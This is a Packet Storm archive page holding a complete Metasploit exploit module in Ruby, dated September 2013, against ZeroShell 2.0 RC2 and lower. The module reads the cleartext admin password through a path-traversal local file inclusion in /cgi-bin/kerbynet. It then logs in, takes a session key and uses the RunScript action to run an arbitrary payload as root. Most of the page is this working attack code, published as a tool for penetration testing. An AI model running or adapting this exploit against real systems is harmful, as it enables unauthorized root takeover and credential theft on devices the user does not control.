what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ZeroShell Remote Code Execution

ZeroShell Remote Code Execution
Posted Sep 25, 2013
Authored by Yann CAM | Site metasploit.com

This Metasploit module exploits a vulnerability found in ZeroShell 2.0 RC2 and lower. It will leverage an unauthenticated local file inclusion vulnerability in the "/cgi-bin/kerbynet" url. The file retrieved is "/var/register/system/ldap/rootpw". This file contains the admin password in cleartext. The password is used to login as the admin user. After the authentication process is complete it will use the RunScript action to execute the payload with root privileges.

tags | exploit, local, cgi, root, file inclusion
SHA-256 | f2193eea137458685913c7447d099d29999247310ec1af67fb445ea5bf5576dc

ZeroShell Remote Code Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => "ZeroShell Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in ZeroShell 2.0 RC2 and lower.
It will leverage an unauthenticated local file inclusion vulnerability in the
"/cgi-bin/kerbynet" url. The file retrieved is "/var/register/system/ldap/rootpw".
This file contains the admin password in cleartext. The password is used to login
as the admin user. After the authentication process is complete it will use the
RunScript action to execute the payload with root privileges.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yann CAM', # Discovery, PoC
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://packetstormsecurity.com/files/122799/ZeroShell-2.0RC2-File-Disclosure-Command-Execution.html' ]
],
'Platform' => ['linux'],
'Arch' => ARCH_X86,
'Targets' =>
[
['ZeroShell 2.0 RC2', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 22 2013",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the ZeroShell instance', '/'])
], self.class)
end

def uri
return target_uri.path
end

def peer
return "#{rhost}:#{rport}"
end

def check
# Check version
print_status("#{peer} - Trying to detect ZeroShell")

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri)
})

if res and res.code == 200 and res.body =~ /ZeroShell/
print_good("ZeroShell detected")
end

unless password.nil?
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end

# Retrieve admin password using unauthenticated LFI
def password
rootpw = "../../../var/register/system/ldap/rootpw"
print_status("#{peer} - Retrieving cleartext admin password")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"),
'vars_get' => {
'Section' => "NoAuthREQ",
'Action' => "Render",
'Object' => rootpw
}
})

if res and res.code == 200 and res.body !~ /not found/
res.body =~ /^(.*)$/
pass = $1
print_status("#{peer} - Password retrieved [ #{pass} ]")
return pass
else
return nil
end
end


# Login using the retrieved password and grab the session key from the response body.
def login(admin_password)
print_status("#{peer} - Log in and retrieving session key")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"),
'vars_post' => {
'Action' => "StartSessionSubmit",
'User' => "admin",
'PW' => admin_password
}
})

if res and res.code == 200 and res.body =~ /STk=([a-zA-Z0-9]+)&Action/
sessionkey = $1
print_status("#{peer} - Session key retrieved [ #{sessionkey} ]")
return sessionkey
else
fail_with(Failure::Unknown, "#{peer} - Retrieving session key failed!")
end
end

# The RunScript action will run shell commands directly with root privileges.
def execute_command(cmd, opts)
script_name = rand_text_alphanumeric(8)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"),
'vars_post' => {
'Action' => "RunScript",
'Section' => "Setup",
'STk' => @session,
'ScriptName' => script_name,
'Script' => cmd + '&'
}
})

if res and res.code != 200
fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
end

end

def exploit
admin_password = password
if admin_password.nil?
fail_with(Failure::Unknown, "#{peer} - Retrieving password failed!")
end

@session = login(admin_password)

execute_cmdstager
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close